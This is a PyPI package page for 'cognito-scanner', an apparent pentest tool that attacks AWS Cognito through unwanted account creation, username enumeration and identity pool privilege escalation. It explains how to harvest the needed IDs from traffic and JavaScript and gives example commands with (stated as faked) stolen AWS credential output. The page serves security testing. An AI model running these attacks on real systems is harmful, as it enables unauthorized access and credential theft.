Skip to main content

No project description provided

Project description

Cognito Scanner

A simple script which implements different Cognito attacks such as Account Oracle or Priviledge Escalation

Cover

If you are not confortable with Cognito and want to understand the attacks better, you can check this article !

Purpose of this repository

Cognito is a AWS service which provides a secure and scalable user authentication and access control for web and mobile applications.

This repository contains a script which implements three different attacks on Cognito :

  1. Unwanted account creation
    • What is it? It is a malicious attempt to create user accounts without proper authorization or authentication, often leading to an influx or unauthorized accounts within a system.
    • Parameters needed from AWS? Only the Client ID protected by the Cognito instance.
  2. Account Oracle
    • What is it? It is a type of attack where an attacker exploits an external information source (known as "oracle"), to get information about a service or to gain unauthorized access.
    • Parameters needed from AWS? Only the Client ID protected by the Cognito instance.
  3. Identity pool escalation
    • What is it? It refers to the process where authenticated users obtain temporary credentials with higher priviledges through an identity pool, allowing them to access more AWS resources than originally intended.
    • Parameters needed from AWS? The Client ID, the Pool ID and the Identity Pool ID.

Data retrieval

To execute the attacks you will need to pass some arguments. Some of them are from AWS ressources.

What are these parameters?

  • Pool ID (or User Pool ID): unique identifier assigned to a specific user pool, which is used by applications to interact with that user pool and perform authentication and user management operations.
  • Client ID: unique identifier assigned to each application or client that integrates with a user pool, serving to authenticate and authorize requests from trusted sources during the authentication flow.
  • Identity Pool ID: unique identifier for an identity pool, which allows authenticated users to obtain temporary AWS role and credentials for accessing authorized resources.

How do we get them?

You can get these parameters in multiple ways but you have to find them by yourself because it depends on the authentication implementation. If you use an HTTP proxy such as burp, you should be able to easily find these parameters:

  • HTTP parameters: sometimes they are in the parameters of the request.
  • Javascript files: they can also be obfuscated in the javascript code and be retrieved after deobfuscation.
  • HTTP headers: these parameters can also appear in the headers of the requests.
  • Other files: they can be stored in appendix files such as JSON files or CSV files.

Now that we have all the ressources needed, we can start the installation process.

Requirements

You can easily check that all requirements are met with the commands below:

$ python3 --version
$ pip --version
$ git --version

Installation

Using pip

$ pip install cognito-scanner

Manually

  1. Clone repository
# Using HTTPS
$ git clone https://github.com/padok-team/cognito-scanner.git
# Using SSH
$ git clone git@github.com:padok-team/cognito-scanner.git
$ cd cognito-scanner/
  1. Create the python package
# In the root directory of your package, run the following command to build the distribution files
$ python3 setup.py sdist bdist_wheel
# Leave the directory
$ cd
# Install your package using pip
$ pip install path/to/cognito-scanner/dist/cognito-scanner-x.x.x.tar.gz
  1. You can now try to run the tool using cognito-scanner --help

Usage

You can get details of how to use the script :

$ cognito-scanner --help
# Get information about how to use the unwanted account creation script
$ cognito-scanner account-creation --help

Example

The values here are completely faked

Unwanted account creation

$ cognito-scanner account-creation --region=eu-west-3 --user_attributes=mymail@mail.com --client_id=pucXBthcyRvzwqj0WXG28DQeav --username='cognito_user' --password='R4nd0mP4$$word'
# Output
{
	UserConfirmed: False
	UserSub: 2199983e-3555-73bj-12ep-7aff05kc6kd8
}

Account Oracle

$ cognito-scanner account-oracle --client_id=pucXBthcyRvzwqj0WXG28DQeav --region=eu-west-3 --file=usernames.txt
# Output
Users found available in the file ./existing_users.txt

Identity pool escalation

$ cognito-scanner --region=eu-west-3 --pool_id=eu-west-3_liyFAGBUV --client_id=pucXBthcyRvzwqj0WXG28DQeav --identity_pool_id=eu-west-3:52983214-5fd7-438e-9088-b2e839ceefa0 --username=pentest --password='aR4ndomPassw0rd$'
# Output
[hacker]
output = json
aws_access_key_id = ROWIKQXNMUAU76LTQJEB
aws_secret_access_key = wympLAO6i9zn9GPo51hGxGRA8rsIWb8l5zzMa2iD
aws_session_token = LEGcBVDyXxpyYaVs3i0XPa2dB+dCcwbc0IAbkdVpMVf1TTBOVDrNW+P/6/PUAAZabR2SwG9r0qdq3Uj09dm4pvWh+B3BMjmkqh+6JHzj9YYxpmLPKYmLpAkHReIcr56rHLvW0mlBs/UbnthV8r1SIHzG1ze1jjCqA/mt84L8aL6KlPYJuakFWBA2f7iKO7UoR3NmHHc23N/7PfQtIexeKyKgDE1tX4OgYal1K4biAKDWeIsQm1NCfWDDB7i87kETCLYPlAuDKljfPxY1LAL0EvM9zX7lKgPUMfbtR80alEj6JhpZW/BBoEylpbfz7i3ZWSpIvqSlctqxAr5tLcYaJVjpPhP7ZhazNXriS7FZ1/Q6Uw+PGnHUxg0bk5SqjxocU/ya42X6krtJUra0R+Z9pe4dT1vKUBRBzrWyK5BdTa7gI7vOsK50jHcDLJ/CxF4JAbJrynPWTkZ/ZmHIZsD8GjEZh7Gf4fIsg3c0J1RcUevGpwFdCzq1L3rmyyD9+Esd+639u3t6lvltUZK0hPfWl7MUz4kbQ4ve1lzD3d7vn4JPydUTI/Ck34HTUSZnj834M95N6ov3jzwJevcvoCZLEaNbfyvq/UKbpBnI2OZ44kNBF5nWqDZV8BVYOxq63p1WnE++JmG2UC5Y/QZM2OqteIyFFgJ4OvaXtmY5jw6ypj8EhCZUiExl9RiDoS8X4tTlXbx4hGhpWvggKZBN+hfmZTn0FhzTjx1QWGPzVXy66D7ZvJ7O9loW9bS3ydiOfRsUg5etY/P4Ci2QomEvw/+QD4N9sFK1oHQogxq0M3lit0uUj74+Z9GnyHEcrBTKQrUo73dk5PpsENhru1bFZRromMMcB0UlmwpHcSyCq6xpf6jnYWyzfSQ/m/ZAe9UVHftOsZfblNJgftxcw4GSVX/lqpkhWi3eFpma2SvrYMckDbTWVaGmO9z+INGHqMpu7VIhNkzMNQESS

Questions ?

Open an issue to contact us or to give us suggestions. We are open to collaboration !

License

License

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

cognito-scanner-1.0.2.tar.gz (14.1 kB view details)

Uploaded Source

Built Distribution

cognito_scanner-1.0.2-py3-none-any.whl (15.0 kB view details)

Uploaded Python 3

File details

Details for the file cognito-scanner-1.0.2.tar.gz.

File metadata

  • Download URL: cognito-scanner-1.0.2.tar.gz
  • Upload date:
  • Size: 14.1 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.2 CPython/3.11.2

File hashes

Hashes for cognito-scanner-1.0.2.tar.gz
Algorithm Hash digest
SHA256 0877d7ed4a4ea583b271c37660901f81a751bd1254dd5879c40f8456e226ec69
MD5 f6cf1c02d3627e605185fac72e229423
BLAKE2b-256 5bf63570a66846b60bc8fd3590e14ea7f1fe1f639dc0d4c6f2ae73f3372a0fcd

See more details on using hashes here.

File details

Details for the file cognito_scanner-1.0.2-py3-none-any.whl.

File metadata

File hashes

Hashes for cognito_scanner-1.0.2-py3-none-any.whl
Algorithm Hash digest
SHA256 8c35b697d163c108f2d8f760de5bd83b183cde0f55615810047a645e718d686f
MD5 89f801e0f972deeffe73a1503efcc3ae
BLAKE2b-256 19c0fb09eb5ed1b7074e81216d92621daae07d5bd83d859ef46ae75482fbe4ba

See more details on using hashes here.

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page